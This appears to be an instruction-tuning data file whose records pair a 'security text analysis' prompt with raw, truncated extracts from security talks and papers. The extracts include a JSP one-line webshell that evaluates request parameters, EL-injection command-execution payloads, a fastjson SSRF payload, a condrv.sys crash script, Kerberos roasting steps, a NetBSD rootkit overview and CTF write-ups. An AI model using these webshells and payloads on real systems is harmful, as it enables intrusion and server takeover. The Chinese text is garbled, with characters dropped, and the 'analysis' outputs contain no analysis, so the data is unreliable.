{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 种新型Java句话的实现 前 基本原理 获取脚本引擎 绑定对象 eval 基本语法 调Java法 导Java类型 创建Java类型的数组 导Java类 法调与重载 Payload结构设计 语法问题的坑 两种语对象间的相互转换 Rhino/Nashorn解析的差异 反射的坑 保底操作 测试 最后 @yzddMr6 直以来Java句话都是采打字节码defineClass实现的这种法的优势是可以完整的打 进去个类可以乎实现Java上的所有功能不之处就是Payload过于巨并且不像脚本语 样便修改并且还存在很多特征例如继承ClassLoader反射调defineClass等本在这提出 种新型Java句话利Java中JS引擎实现的句话 前 基本原理 2 1. Java没有eval函数Js有eval函数可以把字符串当代码解析 2. Java从1.6开始带ScriptEngineManager这个类原持调js需安装第三库 3. ScriptEngine持在Js中调Java的对象 综上所述我们可以利Java调JS引擎的eval然后在Payload中反过来调Java对象这就是本 提出的新型Java句话的核原理 ScriptEngineManager全名javax.script.ScriptEngineManager从Java 6开始带其中Java 6/7采 的js解析引擎是Rhino从java8开始换成了Nashorn不同解析引擎对同样的代码有些差别这 点后有所体现 如果说原理其实两句话就可以说清楚但是难点在于Payload的编写跨语调最的个难点就 是数据类型以及法的转换例如Java中有byte数组Js中没有怎么办C++有指针但是Java没有 这个玩意怎么办 在实现期间踩了很多的坑这篇章跟家起掰扯掰扯希望能给家提供点帮助 或者通过eval的重载函数直接把对象通过个HashMap放进去 获取脚本引擎 Plain Text 复制代码 绑定对象 Plain Text 复制代码 //通过脚本名称获取 ScriptEngine engine = new ScriptEngineManager().getEngineByName(\"JavaScript\"); //简写为js也可以 //通过件扩展名获取 ScriptEngine engine = new ScriptEngineManager().getEngineByExtension(\"js\"); //通过MIME类型来获取 ScriptEngine engine = new ScriptEngineManager().getEngineByMimeType(\"text/javascript\"); 1 2 3 4 5 6 ScriptEngine engine = new ScriptEngineManager().getEngineByName(\"js\"); engine.put(\"request\", request); engine.put(\"response\", response); engine.eval(request.getParameter(\"mr6\")); 1 2 3 4 3 综合上两步有很多种写法例如 shell.jsp 或者直接缩写成句 以执命令为例 POSTmr6=java.lang.Runtime.getRuntime().exec(\"calc\"); Plain Text 复制代码 eval Plain Text 复制代码 Plain Text 复制代码 new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(request.getPara meter(\"ant\"), new javax.script.SimpleBindings(new java.util.HashMap() {{ put(\"response\", response); put(\"request\", request); }})) 1 2 3 4 <% javax.script.ScriptEngine engine = new javax.script.ScriptEngineManager().getEngineByName(\"js\"); engine.put(\"request\", request); engine.put(\"response\", response); engine.eval(request.getParameter(\"mr6\")); %> 1 2 3 4 5 6 7 8 <% new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(requ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n360 企业安全集团 Attacking Kerberos 演讲人吴方东n1nty @ 360 A-TEAM 2 0 1 8 吴方东n1nty @ 360 A-TEAM 安全研究员  360 企业安全集团旗下的纯技术研究团队  致力于 Web 渗透APT 攻防对抗前瞻性攻防工具预研  进行严肃有深度的技术研究深入还原攻与防的技术本质 360 A-TEAM 资深失眠患者 服务端验证你是否真的是你所声称的那个人的过程 非加密通道会导致明文密码泄露 USERNAME/PASSWORD 我要登陆这是我的账号密码 对比账号密码 成功 失败  不需要传输密码本身  可在非加密通道使用 USER01 我要登陆 告诉我你是谁用你的密码加密这段随机数据 kjdfADSF435@#$ASDfd)( 我是 USER01这是我加密后的结果....... 结果一样成功 结果不一样失败 基于票据的 身份认证协议 MIT 发明 微软进行了扩展 域环境下的 首选认证协议  账号密码认证  通过向服务端发送账号密码来证明自己的身份  挑战认证  通过向服务端发送一段计算结果来证明自己的身份  Kerberos 认证  通过向服务端发送一张票来证明自己的身份 KDC  域内最重要的服务器  统一保存着所有账号的密码 使用人USER01权限xxx 允许访问的服务SMB/SERVER1 到期时间2018-08-24 23:00:00 Session key Kerberos Ticket 其他信息 KDC 印章 加密的 Kerberos 票据 KDC  域内最重要的服务器  统一保存着所有账号的密码 TGT  访问 TGS 服务的票 普通票据  访问其他服务的票 TGT 普通票据 KDC 客户端访问任何 使用 Kerberos 认证的服务之前 利用 TGT 去向 KDC 换取访问目标服务 的 KDC user01 server1 我是 user01 给我一张访问 smb\\server1 的票 我是 user01我要访问你的 smb 服务 这是证明我身份的票 KDC 1, AS-REQ 3, TGS-REQ user01 server1 2, AS-REP 4, TGS-REP 5, AP-REQ 6, AP-REP  AS-REQ  我是 user01这是一段加密数据来 证明我的身份  AS-REP  身份验证成功给你一张能证明你是 user01 的票TGT以及对应的 Session Key AS-REQ AS-REP user01 KDC AS-REQ authenticator 验证因子  AS-REQ  我是 user01这是一段加密数据来 证明我的身份  AS-REP  身份验证成功给你一张能证明你是 user01 的票TGT以及对应的 Session Key AS-REQ AS-REP user01 KDC AS-REP 加密的 TGT 加密的 Session Key  AS-REQ 不进行预身份认证时  我是 user01但是我不想提交 authenticator 来证明我的身份请给我一张 TGT  成功时AS-REP   user01 账号存在并且配置了不要求进行预身份验证  失败时KRB-ERROR  PREAUTH-REQUIRED  UNKNOWN-PRINCIPLE AS-REQ AS-REP user01 KDC AS-REQ 去掉这段数据 发送 AS-REQ 请求时不进行预身份验证 根据返回的错误码可判断用户是否存在 响应类型 结果 AS-REP 响应 账号存在 且开启了 不要求 Kerberos 预身份验证选项 KRB-ERRORPREAUTH-REQUIRED 账号存在 未开启 不要求 Kerberos 预身份验证选项 KRB-ERRORCLIENT-REVOKED 账号存在 但是处于锁定状态 KRB-ERRORUNKNOWN-PRINCIPLE 账号不存在  AS-REQ由客户端发送至 KDC  我是 user01我不进行预身份验证 请给我一张 TGT  AS-REP由 KDC 返回  经过检查发现 user01 被配置为不需 要进行预身份验证这里给你返回一个 AS-REP里面包含了你想要的 TGT 以及与 TGT 配合使用的 session key enc-part(session key) 部分被 RC4 算法加密且密钥为 user01 账号的 NT HASH 离线暴力破解 enc-part 可还原 user01 的明文密码 AS-REQ 用户枚 举 LDAP 查询 USER01 USER02 USER03 不需要预身份认证 USER01 Session Key USER02 Session Key USER03 Session ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nToasterkit - A NetBSD Rootkit Anthony Martinez Thomas Bowen http://mrtheplague.net/toasterkit/ Toasterkit - A NetBSD Rootkit 1. Who we are 2. What is NetBSD? Why NetBSD? 3. Rootkits on NetBSD 4. Architectural Overview 5. Our contributions 6. Demo 7. Protection 8. Prevention Who we are - Anthony Martinez Anthony is a system administrator for the New Mexico Institute of Mining and Technologys Computer Center, as well as an undergraduate Computer Science student at the university. He originally proposed the project that evolved into Toasterkit. Who we are - Thomas Bowen Thomas is a system administrator for the New Mexico Institute of Mining and Technologys Computer Center. He is also enrolled in the Computer Science program with emphasis in Information Assurance. Why NetBSD? NetBSD is a popular operating system for embedded systems. It is also extremely source-portable, meaning that when written properly, anything targeting the kernel is equally so. This way, the rootkit can work on any NetBSD port! Additionally, NetBSD is something of a research tool  new ideas such as Veriexec and the kauth frameworka are being worked on in NetBSD, and nobody (else) is targeting them. aWhich originated in Mac OS X. History of Rootkits on NetBSD Chkrootkit hasnt been updated since NetBSD 1.6. Were at 4.0, with 5 soon to be released. If there are any rootkits targeting recent versions of NetBSD, none of them appear to be public. Overview of NetBSD Architecture Portable across hardware The slogan: Of course it runs NetBSD. Excellent support for cross-building. Architecture of code All of the architecture-dependent pieces are abstracted behind common functions; we dont have to worry about byte order, memory-manager specifics, etc. Loadable Kernel Modules (LKM) Not commonly used, but are enabled by default. It also allows code to infiltrate the kernel ex post facto; security-conscious administrators might disable this. Modules can add syscalls, sysctl nodes, executable formats, filesystem dr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVulnerable Out of the Box: An Evaluation of Android Carrier Devices Ryan Johnson - Kryptowire Angelos Stavrou - Kryptowire Why Look for Cyber Threats? Aggressive data collection  Exfiltration of sensitive user-data to China (Adups)  Sensitive data collection (OnePlus 5) Remote system compromise  System compromise from insecure network communications (Ragentek) User data disclosure due to vendor modifications  Samsung leaking log data (CVE-2017-7978)  MediaTek leaking log data (CVE-2016-10135) Local privilege escalation to the root user  Alcatel A30 (former Amazon Prime Exclusive Device)  Leagoo P1  Privileged EngineerMode app (OnePlus 5)  Android 4.4 devices with a MediaTek chipset 2 Pre-installed Apps and Vendor OS Modification Android devices contain a set of pre-installed apps  May not be available on Google Play  Some apps cannot be disabled Pre-installed apps can be malicious and/or insecure  Insecure apps can be locally or remotely exploited  Malicious apps can provide backdoor functionality and may exfiltrate sensitive user data Vendors generally modify Googles official Android code to provide custom behavior  (Un)intentionally expose sensitive capabilities  Privileged platform apps 3 Source: https://developer.android.com/guide/platform/index.html App Components Fundamental functional blocks of an Android app  Activity  Broadcast Receiver  Service  Content Provider Declared in the apps manifest file May provide accessible entry-points into an app for other apps to exploit by using intents which are a message-like abstraction for communication within between apps  Contains Intent-specific fields and potentially embedded data 4 Exported Application Components Exported components are accessible to any process on the device  Regulated by the android:exported and android:permission app component attributes Android OS will export components, by default, if the app component does not use the android:exported attribute and declares at least one intent-filter 5 <servi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfastjson net.sf.json-lib org.json JSON-lib org.json Java Jacksongson fastjson json-lib/org.json SSRF fastjson URL fastjson Java autotype java.net.URL java.net.URL URL get URL URL getContent() fastjson getContent() fastjson 1.2.76 SSRF new URL(...).getContent(); new URL(...).openStream(); new URL(...).openConnection().connect(); fastjson JSONPath JSON get getContent() json-lib org.json getContent getContent json-lib JSONObject fromObject()put() containsValue org.json JSONObject org.json json-lib get fastjson JSON org.json/json-lib fastjson fastjson issue fastjson json-lib net.sf.json.JSONObject java.util.Map fastjson Map com.alibaba.fastjson.parser.deserializer.MapDeserializer java.util.Map Yongtao Wang & Yang Zhang - NTLM Relay Risk Is Coming_ A New Exploit Technique Makes It Reborn Java+Windows SSRF rce gadget NTLM Hash TypeReference<Map<String, Object>> typeReference = new TypeReference<Map<String, Object>>() { }; Map<String, Object> stringObjectMap = JSON.parseObject(\" {\\\"@type\\\":\\\"net.sf.json.JSONObject\\\",\\\"a\\\": {\\\"@type\\\":\\\"net.sf.json.JSONObject\\\",\\\"x\\\": {\\\"@type\\\":\\\"java.net.URL\\\",\\\"val\\\":\\\"http://127.0.0.1:2333\\\"}}}\", typeReference); exploit 5alt/UltraRelay ubuntu http Windows server 2008 java.net.URL http NTLM Hash NTLM Hash springboot fastjson httpMessageConverter RequestMapping @RequestBody fastjson JSON.parse SSRF json fastjson json Map fastjson Map Map JSON JSON JSON JSON Map API fastjsonJSON-liborg.json jackson gson json json", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOpen in 30 Seconds Cracking One of the Most Secure Locks in America Marc Weber Tobias Matt Fiddler LOCKS, LIES, and HIGH INSECURITY  Dominant high security lock maker  40 year history of security  Many expert attempts to crack with limited success, complicated tools  Misstatements and disinformation  18 month research project results: A Total compromise of security MEDECO HIGH SECURITY:  UL, BHMA / ANSI, VdS Certified  High level of protection against attack  Picking: 10-15 minute resistance  No bumping  Forced Entry: 5 minutes, minimum  Key control  Protect restricted and proprietary keyways  Stop duplication, replication, simulation of keys HIGH SECURITY LOCKS:  Protect Critical Infrastructure, high value targets  Stringent security requirements  High security Standards  Threat level is higher  Protect against Forced, Covert entry  Protect keys from compromise MEDECO HISTORY  Dominant high security lock maker in U.S.  Owns 70+ Percent of U.S. high security market for commercial and government  Major government contracts  In UK, France, Europe, South America  Relied upon for highest security everywhere  Considered almost invincible by experts WHY THE MEDECO CASE STUDY IS IMPORTANT  Insight into design of high security locks  Patents are no assurance of security  Appearance of security v. Real World  Undue reliance on Standards  Manufacturer knowledge and Representations  Methodology of attack  More secure lock designs CONVENTIONAL v. HIGH SECURITY LOCKS  CONVENTIONAL CYLINDERS  Easy to pick and bump open  No key control  Limited forced entry resistance  HIGH SECURITY CYLINDERS  UL and BHMA/ANSI Standards  Higher quality and tolerances  Resistance to Forced and Covert Entry  Key control ATTACK METHODOLOGY  Assume and believe nothing  Ignore the experts  Think out of the box  Consider prior methods of attack  Always believe there is a vulnerability  WORK THE PROBLEM  Consider all aspects and design parameters  Do not exclude any solution HIGH SECURITY LOCKS: Critical", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 EL表达式注的进阶利 前 环境搭建 正 回显执命令 有回显执命令 任意代码执 直接连接蚁剑 思路扩展 @yzddMr6 表达式注是Java安全从业者会经常碰到的类漏洞Struct2的ognl表达式注Nexus3的EL表 达式注前段时间爆出的Spring Cloud gateway的Spel表达式注等等重要性不需要多说 前段时间徐师在Make JDBC Attacks Brilliant Again 番外篇也提到了postgresql+EL表达式来 写Weblogic句话的场景所以今天想借此机会分享些进阶利的payload Tomcat 8.5+jdk8 这模拟了个el表达式注的场景 前 环境搭建 C# 复制代码 <%@ page import=\"org.apache.jasper.runtime.PageContextImpl\" %> <% String res = (String) PageContextImpl.proprietaryEvaluate(request.getParameter(\"code\"), String.class, pageContext, null); out.print(res); %> 1 2 3 4 5 2 可能家最常到的就是执命令的payload由于el表达式不能执new等操作所以需要反射来构 造 样例如下 或者是借助js引擎 不过两者都是回显的不优雅 最早看到的有回显相关的研究是在这篇章https://forum.butian.net/share/886写的常好最 后的payload如下 正 回显执命令 有回显执命令 C# 复制代码 code=${\"\".getClass().forName(\"java.lang.Runtime\").getMethod(\"exec\",\"\".get Class()).invoke(\"\".getClass().forName(\"java.lang.Runtime\").getMethod(\"get Runtime\").invoke(null),\"calc.exe\")} 1 C# 复制代码 code=${\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInsta nce().getEngineByName(\"js\").eval(\"new+java.lang.ProcessBuilder['(java.lan g.String[])'](['cmd','/c','calc']).start()\")} 1 3 由于EL表达式不持直接赋值以及new对象所以需要到pageContext.getAttribute跟 pageContext.setAttribute来间接实现变量的传递导致payload写起来常的麻烦也常的臃肿 所以我们换种思路不再使EL身的语法是在js引擎中实现我们的逻辑 在 种新型Java句话的实现 对js引擎的各种语法进了详细的解释 https://yzddmr6.com/posts/%E4%B8%80%E7%A7%8D%E6%96%B0%E5%9E%8BJava%E4% B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E7%9A%84%E5%AE%9E%E7 %8E%B0/ 经过简化后我们的payload如下 C# 复制代码 ${pageContext.setAttribute(\"inputStream\", Runtime.getRuntime().exec(\"cmd /c dir\").getInputStream());Thread.sleep(1000);pageContext.setAttribute(\"inpu tStreamAvailable\", pageContext.getAttribute(\"inputStream\").available());pageContext.setAttri bute(\"byteBufferClass\", Class.forName(\"java.nio.ByteBuffer\"));pageContext.setAttribute(\"allocateM ethod\", pageContext.getAttribute(\"byteBufferClass\").getMethod(\"allocate\", Integer.TYPE));pageContext.setAttribute(\"heapByteBuffer\", pageContext.getAttribute(\"allocateMethod\").invoke(null, pageContext.getAttribute(\"inputStreamAva", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nget_module === 获取Linux内核模块的详细信息 ## 补充说明 **get_module命令** 用于获取Linux内核模块的详细信息 ### 语法 ```shell get_module 模块名 ``` ### 实例 使用lsmod命令查看内核模块 ```shell lsmod | head -5 Module Size Used by ipv6 272801 15 xfrm_nalgo 13381 1 ipv6 crypto_api 12609 1 xfrm_nalgo ip_conntrack_ftp 11569 0 ``` 使用get_module命令查看模块详细信息 ```shell get_module ipv6 refcnt : 15 srcversion : 8CC9C024755B4483E56C0EF Parameters: autoconf : 1 disable : 0 disable_ipv6 : 0 Sections: .altinstr_replacement : 0xf8f1a3cf .altinstructions : 0xf8f1d03c .bss : 0xf8f36000 .data.read_mostly : 0xf8f34d20 .data : 0xf8f2f7a0 .exit.text : 0xf8f1a234 .gnu.linkonce.this_module : 0xf8f34e00 .init.data : 0xf8a16a60 .init.text : 0xf8a16000 .module_sig : 0xf8f37960 .rodata.str1.1 : 0xf8f1ae46 .rodata : 0xf8f1a420 .smp_locks : 0xf8f1d150 .strtab : 0xf8f29840 .symtab : 0xf8f24000 .text : 0xf8ef5000 __kcrctab : 0xf8f1de70 __kcrctab_gpl : 0xf8f1d9cc __ksymtab : 0xf8f1dd78 __ksymtab_gpl : 0xf8f1d954 __ksymtab_strings : 0xf8f1da44 __param : 0xf8f1da08 __versions : 0xf8f1df00 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBiting the Hand That Feeds You 2007 Biting the Hand That Feeds You 1 Biting the Hand That Feeds You Storing and Serving Malicious Content from Well Known Web Servers Billy K Rios  Senior Researcher Nathan Mcfeters  Senior Researcher Kicking Down the Cross Domain Door ii Intended Audience This paper assumes the reader has a solid understanding of web application security principles, Cross Site Request Forgery, and web browser security mechanisms. Contributing Authors Version 1.0 Billy Kim Rios  Senior Researcher  VeriSign Inc, Seattle Nathan Mcfeters  Senior Researcher  Advanced Security Center, Houston Kicking Down the Cross Domain Door iii Table of Contents INTENDED AUDIENCE............................................................................................................................ II CONTRIBUTING AUTHORS................................................................................................................... II CHAPTER 1  WHO DO YOU TRUST? .................................................................................................. 4 1. OVERVIEW .............................................................................................................................................. 4 2. BROWSER/APPLICATION SECURITY MEASURES...................................................................................... 4 3. A NEW TWIST ON CROSS SITE REQUEST FORGERY................................................................................. 5 CHAPTER 2  BITING THE HAND - YAHOO....................................................................................... 7 1. CREATING AN ACCOUNT......................................................................................................................... 7 2. UPLOADING CONTENT ............................................................................................................................ 7 3. BYPASSING MISCELLANEOUS PROTECTION MEASURES.........................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFast verified post-quantum software Daniel J. Bernstein SymCrypt: failures for rare inputs Its actually a bug within SymCrypt, the core cryptographic library responsible for implementing asymmetric crypto algorithms in Windows 10 and symmetric crypto algorithms in Windows 8. Warning: Google Researcher Drops Windows 10 Zero-Day Security Bomb, Forbes, https://tinyurl.com/y69fx3nh Daniel J. Bernstein, Fast verified post-quantum software 3 Falcon software: skewed randomness Produced signatures were valid but leaked information on the private key. . . . The fact that these bugs existed in the first place shows that the traditional development methodology (i.e. being super careful) has failed. OFFICIAL COMMENT within NISTPQC (NIST Post-Quantum Cryptography Standardization Project), https://tinyurl.com/y5w46bde Daniel J. Bernstein, Fast verified post-quantum software 4 Minerva: timing attack Libgcrypt, wolfSSL, and Crypto++ have issued patches over the summer to fix this bug. Maintainers of MatrixSSL fixed some issues, but the library remains vulnerable. Oracles SunEC library remains open to attacks. Minerva attack can recover private keys from smart cards, cryptographic libraries, ZDNet, https://tinyurl.com/y6rlkov4 Daniel J. Bernstein, Fast verified post-quantum software 5 Cryptographic software has a problem . . . 2021.07 BlessingSpecterWeitzner You really shouldnt roll your own crypto: an empirical study of vulnerabilities in cryptographic libraries: 73 actual cryptographic vulnerabilities, including 11 severe cryptographic vulnerabilities, among OpenSSL, GnuTLS, Mozilla TLS, WolfSSL, Botan, Libgcrypt, LibreSSL, BoringSSL post-2010 CVEs. Daniel J. Bernstein, Fast verified post-quantum software 6 . . . and the complexity is getting worse Must be post-quantum! Must be fast! Must stop timing attacks! Complicated ecosystem of post-quantum specs Much more complicated ecosystem of post-quantum software Daniel J. Bernstein, Fast verified post-quantum software 7 Examples of the complic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# angrybird (RE 125) ###ENG We are faced with x64 ELF binary. Binary is obviously corrupted - it exits right at the beginning. Unfortunatelly I don't have non-patched binary anymore, but I had to NOP a lot of code at the beginning: ```asm 55 push rbp 48 89 E5 mov rbp, rsp 48 83 C4 80 add rsp, 0FFFFFFFFFFFFFF80h 64 48 8B 04 25 28+mov rax, fs:28h 48 89 45 F8 mov [rbp+var_8], rax 90 nop 90 nop 90 nop 90 nop 90 nop 90 nop 90 nop 90 nop 90 nop 90 nop 90 nop 48 C7 45 90 18 60+mov [rbp+var_70], offset strncmpp 48 C7 45 98 20 60+mov [rbp+var_68], offset putsp 48 C7 45 A0 28 60+mov [rbp+var_60], offset stack_chk_fail 48 C7 45 A8 38 60+mov [rbp+var_58], offset startmain B8 00 00 00 00 mov eax, 0 E8 4B FF FF FF call should_return_21 89 45 8C mov [rbp+n], eax B8 00 00 00 00 mov eax, 0 90 nop 90 nop 90 nop 90 nop 90 nop B8 00 00 00 00 mov eax, 0 ``` And patch function `should return 21` (because according to debug string, it should return 21): ```asm should_return_21 proc near 55 push rbp 48 89 E5 mov rbp, rsp BF 64 50 40 00 mov edi, offset s ; \"you should return 21 not 1 :(\" E8 8C FE FF FF call _puts 8B 05 56 59 20 00 mov eax, cs:const_1 5D pop rbp C3 retn should_return_21 endp ``` Now binary is working correctly: it reads flag, and does a lot of checks, one char at a time: ![](./screen1.png) This looks easy enough, right? Well, let's zoom out: ![](./screen2.png) Wait, what? Let's zoom out even more: ![](./screen3.png) `O_o`. Ok, we might need to do this more intelligently. Turns out that if you think hard enough, everything is trivial. Or maybe just angr creators are genius, I don't know. Anyway, I created this very basic angr script (my second angr experience ever): ```python import angr main = 0x4007DA find = 0x404FAB find = 0x404FC1 avoid = [0x400590] p = angr.Project('./angrybird2') init = p.factory.blank_state(addr=main) pg = p.factory.path_group(init, threads=8) ex = pg.explore(find=find, avoid=avoid) final = ex.found[0].state flag = final.posix.dumps(0) print(\"Flag: {0}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# condrv.sys 内存损坏漏洞 前面的没怎么看懂,尝试看后面的 condrv.sys 全局找 condrv.sys, 发现 C:\\Windows\\System32\\drivers\\condrv.sys, 复制一份, ida64 打开 选择从符号服务器下载 跟到 CdpDispatchCreate 查看反汇编 它会循环比较文件名是不是预定义的几个如果是则调用预定义的创建回调函数 跟到 CdpObjectCreationTable 目前网上的 poc 如下 ``` <script>document.location = '\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect';</script> ``` poc 里面打开的是 kernelconnect, 所以会调用 CdCreateKernelConnection, 跟进 这里判断, 如果先前模式是 usermode 则返回 - 1073741790, 简单换算一些 ``` 1. 先将 1073741790 转换成 2进制,共 30 位 11 1111 1111 1111 1111 1111 1101 1110 2. 最前面一位为符号位 1,前面补一位0 得 32 位 1011 1111 1111 1111 1111 1111 1101 1110 3. 除符号位外,按位取反再加1 1100 0000 0000 0000 0000 0000 0010 0010 4. 转换成十六进制 C 0 0 0 0 0 0 2 2 ``` > 这里可以直接右键 Hexadecimal 进行转换 这个 0xc000022 搜一下就知道是 windows 常用的一个报错即拒绝访问也就是设计之初内核是不允许用户直接使用这个符号链接的 这个直接返回拒绝再处理 IRP 时没有设置 IRP 的状态码和调用 IoCompleteRequest 结束 IRP导致当 IRP 返回时其 IoStatus.Status 为 0NTSTATUS 值为 0 为 NT_SUCCESS而在函数 IopPraseDevice 中是以 IoStatus.Status 为准, 所以 IopPraseDevice 错误的认为 IoCalldriver 是成功的进而引发后续错误地关闭文件对象从而导致蓝屏手动测试修改 IoStatus.Status 为失败值蓝屏消失 IoStatus.Status 这里可以参考 - https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/completing-the-irp - Completing the IRP - https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/using-ntstatus-values - Using NTSTATUS Values --- **Source & Reference** - [Windows 10 bug crashes your PC when you access this location](https://www.bleepingcomputer.com/news/security/windows-10-bug-crashes-your-pc-when-you-access-this-location/) - [更新深信服EDR快速响应支持防护Windows condrv.sys内存损坏漏洞](https://mp.weixin.qq.com/s/QhGYn6wPquSY6obvjgt8VQ) - [驱动在IoCallDriver之前应设置IoStatus.status的状态](https://www.jianshu.com/p/29fddad42736)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Six Year Old Hacker: References and resources: Educational Theory, Piaget, Montessori, Papert and others: http://education.indiana.edu/~p540/webcourse/develop.html http://www.ship.edu/~cgboeree/piaget.html http://www.montessori.edu/ http://www.montessori.org/ Stoll Lillard, Angeline; Montessori: The Science Behind the Genius (Oxford University Press 2005) http://www.papert.org/ Papert, Seymour; Mindstorms: Children, Computers, and Powerful Ideas, (Basic Books 1999) Papert, Seymour; Constructionism Research Reports and Essays, 1985-1990 (Greenwood Pub Group 1991) Programing: LOGO Foundation. http://el.media.mit.edu/logo-foundation/ UCB LOGO, runs under several OSs. A good source for serious LOGO programing texts. http://www.cs.berkeley.edu/~bh/logo.html Windows version of LOGO derived from UCB LOGO. Runs well under Wine. Good links. http://www.softronix.com/logo.html Two good sources for programing projects. Life and CoreWar! Dewdney, A. K.; Armchair Universe: An Exploration of Computer Worlds (New York: W. H Freeman & Co 1988) Dewdney, A. K.; The Tinkertoy Computer and Other Machinations: Computer Recreations... (New York:W. H Freeman & Co 1993)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking from the Palm of your Hand Paul Clip DEFCON - August 01, 2003 P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L  2 0 0 3 @ S T A K E , I N C . Agenda Goals Past  Overview of the Palm Platform  Hacker Tools on the Palm Present  AUSTIN - A Palm OS Vulnerability Scanner  Architecture  Features  Demos  But wait, theres more!!! Future  New Features P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L  2 0 0 3 @ S T A K E , I N C . Goals Overview of Palm OS as a hacking platform Walkthrough of a Palm OS-based vulnerability scanner  Architecture  Features & how theyre implemented  Lessons learned Release a new tool for Palm OS Have Fun! P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L  2 0 0 3 @ S T A K E , I N C . The Past Trivia Questions: What was the first Palm Pilot called? How much memory did it have? P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L  2 0 0 3 @ S T A K E , I N C . The Palm Platform Old  Motorola 68K processor  Max speed 66MHz  RAM 2-16MB  Typical resolution 1602  Some color, some b/w screens  Serial/USB port  IR  Some expansion slots  PalmOS 4.x and below New  ARM processor  Max speed 150? 200? 400? MHz  RAM 16-32MB  Typical resolution 3202  All color  USB port  IR  Expansion slots  PalmOS 5.x and above P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L  2 0 0 3 @ S T A K E , I N C . Security Tools Password Generators http://www.freewarepalm.com/utilities/passgen.shtml http://www.freewarepalm.com/utilities/passphrase.shtml Encryption http://cryptopad.sourceforge.net/ http://linkesoft.com/secret/ Password Crackers (old) http://atstake.com/research/tools/password_auditing/ War Dialer http://atstake.com/research/tools/info_gathering/ P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L  2 0 0 3 @ S T A K E , I N C . Communication Tools Telnet http://netpage.em.com.br/mmand/ptelnet.htm SSH (v1 only) http://online.offshore.com.ai/~iang/TGssh/ Web & Mail http://www.eudora.com/internetsuite/ Ping http://www.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n企业SDL实践与经验 美图安全经理Security Paper发起人 SDL是什么 标准化 SDL基本流程 1. 安全培训 2. 需求评估 3. 产品设计 4. 代码编写 5. 渗透测试 6. 上线发布 7. 应急响应 安全培训  意识 WEB安全培训  针对服务端开发  哪里容易出现漏洞  怎么写会更安全 APP安全培训  针对APP开发  数据加密存储  不应该存储敏感数据 安全意识  针对全体项目成员  敏感数据处理办法  如何发送敏感数据 需求评估&产品设计  覆盖 应用系统自身架构安全 应用系统软件功能安全设计要求 应用系统存储安全设计要求 应用系统通讯安全设计要求 应用系统数据库安全设计要求 应用系统数据安全设计要求 后门参数 部署安全检查 身份认证逻辑安全 数据访问机制 集中验证 外部一体化 入口点 外部API 代码编写  规范 危险函数 安全配置 框架安全 常见安全问题代码示例 渗透测试  速度&深度 自劢化扫描 常见场景快速测试点 代码安全检查 上线发布 1. 安全嵌入上线流程 2. 安全准入 3. 安全检查 应急响应 应急响应方案 确保方案落地到人 有电话号码 遏制 复盘 为什么流程这么难推动 君子协定到底可以不可以 金杯共饮之 白刃不相饶 Security Paper 遏制", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Get started (pwn 100) ###ENG [PL](#pl-version) In the task we get an ELF [binary](get_started) to work with. Ret-dec results are: ```c int main(int argc, char ** argv) { printf(\"Qual a palavrinha magica? \"); int32_t str; gets((char *)&str); return 0; } ``` So not much code is executed, but we can see that there is a blatant stack buffer overflow. The task description hints that we don't need to get a shell here, everything is in the binary. So we look at the disassembly and in fact there is: ```asm ; function: get_flag at 0x80489a0 -- 0x8048a1f 0x80489a0: 56 push esi 0x80489a1: 83 ec 08 sub esp, 0x8 0x80489a4: 81 7c 24 10 4f d6 8c 30 cmp dword [ esp + 0x10 ], 0x308cd64f 0x80489ac: 75 67 jnz 0x8048a15 <get_flag+0x75> 0x80489ae: 81 7c 24 14 d1 19 57 19 cmp dword [ esp + 0x14 ], 0x195719d1 0x80489b6: 75 5d jnz 0x8048a15 <get_flag+0x75> 0x80489b8: c7 44 24 04 68 dd 0c 08 mov dword [ esp + 0x4 ], 0x80cdd68 ; \"rt\" 0x80489c0: c7 04 24 88 c3 0b 08 mov dword [ esp ], 0x80bc388 ; \"flag.txt\" 0x80489c7: e8 44 